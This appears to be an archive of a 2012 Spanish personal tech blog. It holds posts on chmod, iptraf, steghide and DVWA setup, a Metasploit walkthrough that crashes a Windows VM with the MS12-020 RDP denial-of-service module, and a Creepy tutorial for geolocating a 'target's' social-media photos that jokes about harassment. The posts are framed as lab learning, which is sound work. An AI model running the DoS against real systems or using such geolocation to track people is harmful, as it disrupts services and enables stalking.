sábado, 31 de marzo de 2012

Geolocalizando con twitter y creepy

  En este post voy a daros a conocer una curiosa herramienta que nos permitirá geolocalizar las imágenes que haya subido nuestro "objetivo" a Twitter o Flicker, su funcionamiento es muy simple, y sus resultados pueden sernos útiles en determinadas situaciones.

  Esta herramienta es Creepy y podemos descargarla de http://ilektrojohn.github.com/creepy, yo para esta breve explicación la utilizaré sobre Backtrack 5 RC2 ya que viene instalada de base.

  Empezamos lanzando creepy, para ello lo podemos hacer desde la terminal con:
creepymap
o desde el menú:
Applications > BackTrack > Information Gathering > Network Analysis > OSINT Analysis > creepy
 con lo que nos aparecerá la siguiente ventana:

Para geolocalizarlas las imágenes de una cuenta basta con poner en Twitter Username o Flickr UserID el nombre de la cuenta que queramos "analizar" y pulsar en Geolocate Target. Con esto solo nos quedará esperar a ver si creepy encuentra información útil con lo que podremos acosar saber donde ha estado nuestro "objetivo".

  Esta herramienta también nos permite cambiar el tipo de mapa utilizado para mostrar los datos o exportar las localizaciones a .kml para importarlas, por ejemplo, con Google Earth.

Nota: Durante las pruebas que hice con esta herramienta me dio algunos fallos con la conexión con twitter, aunque en otras ocasiones me funcionó sin problemas. 
Nota2: Por lo que leí en la web del proyecto estos problemas se solucionaran en futuras versiones.

Después de esta breve entrada, me despido, nos leemos el domingo en #tuxNews.

Aetsu

miércoles, 28 de marzo de 2012

Ocultando archivos con Steghide

  
  En esta entrada voy a comentaros como esconder archivos dentro de otros, esto se puede conseguir mediante esteganografía, y para el post explicaré como esconder un archivo de texto dentro de una imagen usando steghide.

Primero necesitamos instalarlo (en archlinux):
sudo pacman -S steghide
 Ahora queremos ocultar un fichero de texto de nombre fichero.txt en una imagen de nombre imagen.jpg, para ello y partiendo que tenemos ambos en el mismo directorio, ejecutamos:
steghide embed -cf imagen.jpg -ef fichero.txt
cuya sintaxis es:
steghide embed -cf <nombre de la imagen> -ef <nombre del fichero>
 Entonces se nos pedirá una contraseña (salvoconducto) y ya podremos borrar el archivo que queríamos ocultar.


En caso de que quisiéramos revelar el archivo oculto es tan simple como:
steghide extract -sf imagen.jpg
cuya sintaxis es:
steghide extract -sf  <nombre de la imagen>

Con esto, previa confirmación del salvoconducto, veremos el archivo oculto.



Nota: El archivo oculto puede tener cualquier formato, pero el archivo contenedor solo puede ser un “.jpg”, “.bmp”, “ .wmv” o “.au”.


Con esto concluyo el post, nos leemos en breve.


Aetsu

domingo, 25 de marzo de 2012

#tuxNews 03

Tercera entrega de mi recopilación semanal:


Cerramos la semana y nos leemos la siguiente ;)

Aetsu

viernes, 23 de marzo de 2012

DVWAP + XAMPP en Ubuntu

 
 En esta entrada voy a hablaros sobre DVWA un framework que nos permite practicar diversos ataques a infraestructuras web (XSS, SQLi, File inclusion...), todo esto sin meternos en problemas legales.
  Siendo novato en estos temas(a diferencia de mis compañeros de 0verl0ad) me está viniendo bastante bien para conocer los fundamentos de estos ataques de forma fácil y controlada, con lo que me dispongo a comentaros como instalar este interesante banco de pruebas de la forma más simple posible.

Nota: La instalación la he realizado en una máquina virtual con Ubuntu 10.04 y XAMPP, por tanto explicare como configurarlo sobre esta distribución.


[---] Lo primero será configurar XAMPP con la finalidad de hacer funcionar después DVWA sobre este, para ello partimos de un Ubuntu instalado (su instalación es muy simple y no entra en la finalidad de este post), así que descargamos XAMPP de su web :
http://www.apachefriends.org/download.php?xampp-linux-1.7.7.tar.gz
y procedemos a la instalación como muy bien nos explican en su web:
[+] Nos autenticamos como root:
su
[+] Extraemos el archivo descargado en /opt:
tar xvfz xampp-linux-1.7.7.tar.gz -C /opt
[+] Esto instalará un apache+php+mysql en /opt/lampp.

[+] Para ejecutarlo basta con:
/opt/lampp/lampp start
y veremos algo como esto:

Starting XAMPP for Linux 1.7.7...
XAMPP: Starting Apache with SSL (and PHP5)...
XAMPP: Starting MySQL...
XAMPP: Starting ProFTPD...
XAMPP for Linux started.
[+] Para finalizar este paso comprobaremos que está correctamente instalado poniendo en nuestro navegador:
http://localhost


[---] Una vez instalada la base(XAMPP) vamos a descargar DVWA e "instalarlo", esto lo podemos hacer desde:
http://dvwa.googlecode.com/files/DVWA-1.0.7.zip
y nos descargará un pequeño archivo de 1,3 Mb.

[+] Nuestro siguiente movimiento será extraerlo en /opt/lampp/htdocs:
unzip DVWA-1.0.7.zip -d /opt/lampp/htdocs/
[+] Comprobamos que todo funciona bien accediendo con el navegador a:
http://localhost/dvwa

[+] En este momento veremos una pantalla de login, que tenemos que rellenar con:
Username = admin
Password = password
    y pulsamos en "login" con lo que accederemos al panel principal de la aplicación.

 [+] Por último solo nos quedará instalar/configurar la base de datos de DVWA, esto es tan simple como:
 Menú derecho -> Setup y pulsamos en "Create/Reset Database"

Con esto ya tendremos todo configurado para poder acercarnos a este mundo de una forma controlada, segura y sin complicaciones.

Antes de despedirme comentaros que esta implementación de DVWA dista muchísimo de ser segura, tanto la configuración de XAMPP como de la aplicación no son seguros y deberían instalarse en un entorno controlado para evitar sustos.

Ahora sí me despido, nos leemos en breve ;)

Aetsu


martes, 20 de marzo de 2012

Metasploit y MS12-020

 Recientemente ha aparecido una vulnerabilidad que afecta a Windows y su implementación del protocolo RDP (Remote Desktop Protocol) desde XP hasta W7
  Como era previsible, hace poco empezaban a llegar noticias de exploits funcionales que aprovechaban esta vulnerabilidad realizando un DoS al equipo víctima, pero hoy he leído que Metasploit ya incorpora el exploit en su base de datos así que vamos a ver como aprovechar esto.
 Para la demostración he utilizado una máquina virtual con Backtrack 5  R2 junto con Metasploit que ya viene instalado en esta distribución.

  Lo primero que tenemos que hacer es actualizar metasploit, para ello utilizamos en una terminal:
msfupdate
  Si os da problemas como a mí, haced lo siguiente que he encontrado aquí:
cd /opt/metasploit/common/lib
mv libcrypto.so.0.9.8 libcrypto.so.0.9.8-b

mv libssl.so.0.9.8 libssl.so.0.9.8-backup

ln -s /usr/lib/libcrypto.so.0.9.8

ln -s /usr/lib/libssl.so.0.9.8

m
sfupdate
 El siguiente paso es arrancar metasploit con:
msfconsole

a continuación escogemos el módulo a utilizar:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
 
 Si queremos ver los parámetros que requiere para su funcionamiento junto con información del módulo podemos usar 
info
 Como vemos con el comando info requiere del parámetro RHOST referente a la IP del objetivo (en el ejemplo 192.168.0.107), para asignarlo basta con:
set RHOST <ip>
en este caso:
set RHOST 192.168.0.107
  y por último lanzamos el exploit:
run

Con esto deberíamos ver un precioso pantallazo azul en el Windows objetivo :D


  Puesto que este era un post práctico he intentado ir lo mas directo que he podido, si queréis más información sobre la vulnerabilidad aquí tenéis unos enlaces interesantes:
Con todo esto me despido, nos leemos en breve ;)

Aetsu

domingo, 18 de marzo de 2012

#tuxNews 02

Segunda entrada de #tuxNews con lo más interesante que he visto esta semana:
Con esto cierro la semana, nos leemos en breve,

Aetsu

miércoles, 14 de marzo de 2012

Activar SPDY en Firefox 11

SPDY es un protocolo desarrollado por Google que aumenta la velocidad de carga de las páginas web que lo implementen. El porqué de esta entrada es el como habilitarlo en Firefox 11 ya que viene desactivado por defecto.
 
  Para ello es tan simple como ir a:
about:config
y una vez aquí buscar la siguiente opción:
network.http.spdy.enabled
entonces cambiamos su valor de false a true y listo.


Nos leemos en breve,

Aetsu

martes, 13 de marzo de 2012

Plugins interesantes de Firefox


  En esta entrada, como anticipo a la inminente salida de Firefox 11, voy ha escribir sobre algunos plugins de este navegador zorruno que nos ayudaran a mejorar nuestra experiencia con este, aportando desde privacidad, comodidad o velocidad.

Con esto concluyo esta entrada sobre este gran navegador que por desgracia está perdiendo presencia por culpa, en parte, de Google Chrome y su agresiva (y seguramente muy costosa) campaña publicitaria que Google lleva a cabo en favor de su navegador.

En fin, nos leemos en breve ;)

Aetsu

domingo, 11 de marzo de 2012

#tuxNews 01

Como comentaba ayer hoy empiezo la nueva sección #tuxNews con lo que he leído/visto esta semana en la red de redes y ha llamado mi atención:

 Con esto cierro la semana, nos leemos en breve :D

Aetsu

sábado, 10 de marzo de 2012

Se acerca #tuxNews

 He visto que muchos blogs hacen una entrada a final de semana con las noticias o posts más relevantes de los últimos 7 días, entonces yo, para no mostrar lo mismo  escribiré mi propia versión pero con noticias o post que haya leído esta semana, sin importar la fecha, así no mostraré lo mismo que el resto y igual aparecen cosas no tan recientes pero más interesantes :D .

 Esta nueva sección se iba a llamar "The new section", pero claro apple en un alarde de "originalidad" lanzo "The new ipad" y me tumbó la idea, así que he decidido llamar a la nueva sección #tuxNews :D

Nos vemos mañana con la primera entrada,

Aetsu

viernes, 9 de marzo de 2012

Los "oscuros números" de chmod



  Después de haber llamado vuestra atención con este título tan peculiar vuelvo a escribir para hablar de los números que acompañan al comando chmod encargados de asignar los permisos de usuario.
  Para los que no entendáis mi explicación aquí tenéis un ejemplo:
chmod 777 miFichero
  Este número 777 es el que voy a explicar de donde procede y como calcularlo en función de los permisos que queramos asignar.

  El número está compuesto por tres cifras XXX, la primera hace referencia a los permisos del usuario, la segunda a  los del grupo y la tercera cifra a los permisos de otros.
  Cada una puede tomar valores entre 0 y 7 otorgando distintos permisos en función  del número escogido.
0 = Ningún permiso
1 = Ejecución
2 = Escritura
3 = Escritura y ejecución
4 = Lectura
5 = Lectura y ejecución
6 = Lectura y escritura
7 = Lectura, escritura y ejecución
Pero, ¿cómo los calculamos(cada cifra se calcula por separado)?
r = lectura 
w = escritura
x = ejecución
r     w     x
---------------
0     0     0                 =>  0
0     0     1                 =>  1
0     1     0                 =>  2
0     1     1                 =>  3
1     0     0                 =>  4
1     0     1                 =>  5
1     1     0                 =>  6
1     1     1                 =>  7


Veamos algunos ejemplos para grabar con fuego que complementen lo explicado:
  • Otorgarle al fichero "miFichero" permisos de lectura y escritura para el usuario, le ejecución para el grupo y ninguno para otros usuarios.
    chmod 610 miFichero 
  • Otorgarle al fichero "miFichero" permisos de lectura y escritura para el usuario, para el grupo de lectura y para otros de lectura también.
    chmod 644 miFichero
  • Otorgarle al fichero "miFIchero" todos los permisos al usuario y ninguno al resto, tango al grupo como a otros.
    chmod 700 miFichero
Con estos ejemplos concluyo la entrada, nos leemos en el siguiente post.


Aetsu

sábado, 3 de marzo de 2012

Iptraf, actividad de red en tiempo real


  En esta entrada escribiré sobre Iptraf, una herramienta para sistemas GNU/Linux que nos muestra información en tiempo real sobre el tráfico de red que pasa por nuestras interfaces. Es una aplicación que se usa mediante linea de comandos y posee numerosos parámetros de los que mostraré los mas significativos.

Para instalarlo, en Arch Linux basta con:
sudo pacman -S iptraf-ng
  La instalación en el resto de distribuciones no debe variar mucho, sino basta con mirar en el gestor de paquetes ;)

Una vez instalado podemos lanzarlo (como root) con o sin parámetros:
  • Parámetro -i [interfaz]: Especificamos sobre que interfaz se analizaran los datos, sino añadimos mas parámetros empezará a analizar todo el trafico IP que pase por al interfaz.  Si ponemos all en el campo de interfaz analizará todas las interfaces que dispongamos.
  • Parámetro -s [interfaz]: Clasifica el trafico agrupándolo en protocolo (TCP/UDP) y puerto.
  • Parámetro -z [interfaz]: Contabiliza los paquetes recibidos y los agrupa los paquetes en función de su tamaño.
  • Parámetro -h: Nos muestra la ayuda del programa.
  • Sin parámetros: Sino especificamos ningún parámetro accedemos al modo interactivo, en el que mediante menús podemos habilitar varios filtros o activar/desactivar opciones como es el modo promiscuo.

Con esto concluyo, nos leemos en breve ;)

Aetsu